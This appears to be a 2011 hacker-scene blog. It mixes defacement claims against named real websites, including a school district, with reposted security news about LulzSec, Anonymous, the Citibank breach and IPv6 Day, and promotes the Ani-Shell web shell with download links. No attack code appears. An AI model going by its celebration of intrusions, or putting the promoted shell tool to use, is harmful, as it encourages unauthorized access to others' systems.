China-ebooks.com Hacked by Minhal & NoTty_rAJ

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd8yxTUzulpr6BDdiIgexq1hgMnRVv6U4cKg9jegNu0ex4u4Xah38zNLaJXjFjmjYCNJbC-mFFy8no4Fsf78XjLoxz1wOU2ZfMxevQbdYWch7qn3959nCwICSeexpL2Ut3z6CskV0WvJ4/s1600/--%253D%253D%255B%255B+Hacked+By+Minhal+%255D%255D%253D%253D--.png


Hacked website :- http://www.china-ebooks.com/

Mirror :- http://turk-h.org/defacement/view/384180/china-ebooks.com/

26,000 Porn website passwords exposed by LulzSec

networks

Red light districtThe notorious LulzSec hacking group has published login passwords for almost 26,000 users of an x-rated porn website.

The hackers compromised the database of the hardcore website (called "Pron"), exposing not only the email addresses and passwords of over 25,000 members but also the credentials of 55 administrators of other adult websites.

Furthermore, LulzSec drew particular attention to various government and military email addresses (.mil and .gov) that appeared to have accounts with the porn website..

To add insult to injury, the LulzSec group called on its many recent Twitter followers to exploit the situation, by logging into Facebook with the email/password combinations and tell the victim's Facebook friends and family about their porn habit.

Porn passwords

It should go without saying that logging into someone else's account without their permission is against the law in most countries around the world.

Fortunately, it's reported that Facebook's security team responded quickly to the threat - and reset the passwords for all of the accounts it had which matched the email addresses exposed. Of course, it's still possible that those email address/password combinations are being used on other websites.

If anything should be a reminder to internet users of the importance of using different passwords for different websites, this should be it.

The danger is that once one password has been compromised, it's only a matter of time before the fraudsters will be able to gain access to your other accounts and steal information for financial gain or, in this case, potential embarrassment.

If you believe there might be a chance that your username/password were exposed, or if you're simply in the habit of using the same password for multiple websites - now is the time to change your habits.

Motocross Hacked by Minhal Mehdi

Motocross Hacked by Minhal Mehdi

http://www.indirjet.com/presim/Motocross-Madness-2.jpg





Hacked :- website- http://www.motocross-hr.com/
Mirror :- http://turk-h.org/defacement/view/384179/motocross-hr.com/

Central School of America & 2 More websites hacked by Minhal Mehdi

Central School of America & 2 More websites hacked by Minhal Mehdi
http://cdn.wn.com/pd/ac/ec/9f7558ae1dda38fea49bbca4f7f1_grande.jpg




Hacked websites :-

http://www.central.k12.or.us/jaihind.html


http://www.frenchonline-af.org.pk/jaihind.html


http://www.ktvj-online.com/

Saturday, June 11, 2011

So Far, So Good With World IPv6 Day


With World IPV6 Day in full swing, the test flight of the Internet's new communications protocol is going smoothly.
The 24-hour global test run hasn't hit any major glitches, according to a spokesman for Arbor Networks, an Internet security company monitoring the IPv6 activity.
"We didn't see any big problems or slowdowns today. Things went much as they had the day before," said the spokesman, who added that Arbor Networks doesn't have information on how the more than 200 companies participating in the test are fairing individually.
While the number of IPv6 users is still quite small compared to the vast majority that are still using IPV4 today, Scott Iekel-Johnson, an Arbor Networks product manager, noted that the overall levels of IPv6 traffic remain higher today by about 30% to 60% compared to other days.
"We take this to be an encouraging sign that IPv6 adoption is growing and more users are finding IPv6 access, and in particular more users are able to access the Internet via native IPv6 as opposed to being forced to use one of the tunneling protocols to get through IPv4-only portions of the Internet," added Iekel-Johnson.
Internet companies and industry analysts have anticipated this day for several months. Major companies, including Google , Yahoo , Microsoft , Verizon and Facebook , today are giving IPv6 a whirl to see how it works.
IPv4, the Internet's main communications protocol, quickly is running out of unique IP addresses for all of the computers, smartphones and other mobile devices that need to be connected to the Internet. Hence, the development of an upgrade -- IPv6 -- which is said to provide more than 4 billion times more addresses than IPv4.
Some people, though, are concerned that migrating to IPv6 will be time consuming and expensive. World IPv6 Day was designed to test IPv6 and see how well it works. Internet users today can think of themselves as test pilots orr guinea pigs.

mailetv.com.cn Hacked by Minhal

Spain arrests Anonymous suspects


Three suspected members of the Anonymous hacking group have been arrested in Spain.

The trio are said to have been involved in co-ordinating the group's activity in that country.

The arrests were made simultaneously in three Spanish cities - Barcelona, Valencia and Almeria.

Anonymous has claimed responsibility for attacks on Sony, Spanish banks and co-ordinated action in defence of whistle-blowing site Wikileaks.

A statement from the Spanish national police force said that a computer seized in the home of one person it arrested was used in the hacks.

The arrests were the culmination of an investigation that began in October 2010.

It involved Spanish cyber police combing through millions of lines of chat logs to identify who was behind the group's activities.

Some of the attacks made by Anonymous members used a web-based tool called Loic to bombard target sites with data. The websites of PayPal, Mastercard and Amazon were all targeted using this tool.

It seems that Loic did a poor job of hiding the identity of the people using it. It is believed that some police forces have already moved against the group based on this information.

Arrests have been made in the US, UK and Holland of Anonymous members, prior to the raids in Spain.

Anonymous grew out of the online picture sharing site 4Chan and describes itself as a group of concerned internet citizens.

As well as attacking sites that it perceives as not supporting Wikileaks. The loosely organised collective has also attacked government sites in Tunisia and Egypt to aid popular protest movements.

Friday, June 10, 2011

Ani-Shell v1.1 Introducing Back-Connect and Bind-Shell Features | by lionaneesh






New Features

[0x01A] Bind Shell
[0x01B] Back Connect
[0x01C] Fixed Some Coding errors!
[0x01D] Rename Files
[0x01E] Encoded Title

 Link : http://sourceforge.net/projects/ani-shell/
Download : http://sourceforge.net/projects/ani-shell/files/Ani-Shell%20v1.0/Ani-Shell%20v1.0.rar/download
Follow Lionaneesh : https://twitter.com/lionaneesh
Facebook : http://www.facebook.com/lionaneesh

Barak obama's website Hacked by Anti Anonymous !

http://i1106.hizliresim.com/2011/6/9/10346.jpg

Barak obama's website Hacked by Anti Anonymous ! !


Hacked website - http://www.barackobama.ir/

Mirror - http://www.legend-h.org/mirror/176120/barackobama.ir/

Anonymous steals passports and 10,000 e-mails from Iran

Why we secretly love @LulzSec


somehwat-mad-completely-mad-u-mad-MADAD.jpg
Patrick Gray of the Risky Business security podcast wrote a funny rant about why many who work in computer security are secretly chuckling at the antics of hacker/cracker/prankster entity Lulzsec.
"They're posting proprietary developer code. They're bringing back Tupac and Biggie. They're advising Nintendo on more secure httpd configurations. And they're issuing funny press releases via Twitter and Pastebin," Patrick writes.
But more to the point, professional consultants have been trying to teach the I.T. world these fundamental lessons about security for ages—now, thanks to LulzSec, the world is finally listening.
It might be surprising to external observers, but security professionals are also secretly getting a kick out of watching these guys go nuts. I wrote my first article on information security around May 2001. It was about the Sadmind worm and it ran on the letters page of the IT section of The Age newspaper in Melbourne.
"Geez," I thought to myself. "If awareness isn't raised about the unsuitability of these computamajiggies for srs bizness, we could encounter some problems down the track."
So for the last ten years I've been working in media, trying to raise awareness of the idea that maybe, just maybe, using insecure computers to hold your secrets, conduct your commerce and run your infrastructure is a shitty idea. No one who mattered listened. Executives think it's FUD. They honestly think that if they keep paying their annual AV subscriptions they'll be shielded by Mr. Norton's magic cloak.
Security types like LulzSec because they're proving what a mess we're in. They're pointing at the elephant in the room and saying "LOOK AT THE GIGANTIC FUCKING ELEPHANT IN THE ROOM ZOMG WHY CAN'T YOU SEE IT??? ITS TRUNK IS IN YR COFFEE FFS!!!"
There is no security, there will be no security. The horse has bolted, and it's not going to be the infrastructure that's going to change, it's going to be us.
"Why we secretly love LulzSec: Elephant in room visible. Cans open. Worms everywhere." (risky.biz)

A Message To Journalists By Anonymous


A Message To Journalists  By Anonymous




DEAR JOURNALISTS OF THE WORLD,
You were intrigued by us when we took on the financial sector by attacking Visa, Mastercard, and Paypal as part of Operation Payback. Many of you became enamoured with us during Operation Tunisia and applauded our efforts. Some of you are now paying close attention to Operation Algeria. We know that we have gained support from even a few of you. Those few are hoping against hope that our unconventional methods will continue to have an effect on people, perhaps even the world. Those few admire us, if for no other reason than the fact that, in a world full of apathy, a world filled with people who don’t even bother to read the information you painstakingly present, we are trying to do something. This intrigues you. At the very least, it inspires you to keep an eye on us, hoping we continue to take newsworthy actions.
You know that, whether you are risking your own safety – perhaps even your own life – to share the truth, or whether you are beholden to your dictators or your advertisers, unable to write anything they do not approve, we, Anonymous, are on your side and are fighting for you and your freedoms. You, the journalists, reporters, and bloggers. You, the newspapers, television networks and websites who hunt down and disseminate information. We are fighting for you.
Some of you have recorded milestones of our efforts. Some of you have reported upon them, and some of you have even participated in our fight. You are the press, and you have our gratitude.
We need your help now. From North Africa to Gaza, people are rising up and risking their lives to demand nothing more than basic rights, an end to the corruption, and a fair chance to progress in life. What the Western world is unaware of, and the Western media largely ignores, is the fact that the people protesting and the people dying in the Arab world are just like them. They have the same desire for basic freedoms, similar ambitions for themselves and for their family and friends, the same inherent intelligence and, the same keen sense of injustice as their counterparts in the West when oppressed.
Here is where we need your help. We ask you, the journalists, to bring to the rest of the world the humanity of these revolutions. What we are witnessing are not extremist acts that are committed by misled, ignorant people. Indeed, they are committed by intelligent, but desperate people – people willing to sacrifice themselves in order to inspire their fellow citizens to rally against their oppressors. The world needs human news. The world needs to know who it is that needs their support, and not just the number of casualties or the politics involved.
What we ask is simple. There are people protesting in Algeria, Egypt, Yemen, Albania, Libya, and many other countries at this very moment. Tell us who they are and what it is they want for their country and their people, for now and in the future. So many voices are raised in protest right now and all the world can hear is the noise. Tell us what the people are saying.
Some of you will ignore this message. It announces no new operations, as we are still focusing our efforts on Operation Algeria. This message issues no threats, as you are the press and are always safe from us. If you heed our request, however, it could make all the difference in the world, as it made a difference for the Tunisians to know that they were speaking and the world was hearing their message. Help us do this for Algeria, Egypt, and other countries where the people are imploring to be heard.
Signed,
Anonymous.
We are Anonymous.
We do not forgive the denial of basic human rights.
We do not forget those who assist the oppressed.
To the Tyrannical governments of the world… Expect us.

Thursday, June 9, 2011

4 chinese government websites Hacked by Crypton

thedealoftheweek.net Hacked by hex34gl3

Thedealoftheweek.net Hacked by hex34gl3


URL:-   thedealoftheweek.net
Hacked by hex34gl3

CitiBank hacked & large number of customer data stolen

CitiBank hacked & large number of customer data stolen
Security breaches happen, they’re going to continue to happen … the mission of the banking industry is to keep the customer base safe and customers feeling secure about their financial transactions and payments


Citigroup said today that hackers breached the bank's network and may have gained access to the personal data of hundreds of thousands of bank card customers. Customer names, account numbers, and contact information, including e-mail addresses, were reportedly accessed during the breach, which was discovered in May during routine monitoring. However, no Social Security numbers, birthdates or security codes were accessed.

According to Citibank's website they are the world's largest provider of credit cards, issuing more than 150,000,000 cards globally. Based on these numbers, information for 1,500,000 or more individuals may have been compromised.

Citi told the newspaper that the breach affected about 1 percent of its 21 million customers.

We are contacting customers whose information was impacted. Citi has implemented enhanced procedures to prevent a recurrence of this type of event,” Sean Kevelighan, a U.S.-based spokesman, said by email.

Thanks to [THN]  THE HACKERS NEWS

kaman computer's official website hacked by Minhal

Kaman computer's official website hacked by Minhal



 




Hacked website - http://www.kamancomputer.com/


Deface link - http://www.kamancomputer.com/+dz.txt


Mirror - http://turk-h.org/defacement/view/384121/kamancomputer.com/

6 Hacking Forums Hacked by Shadow008 [PCA]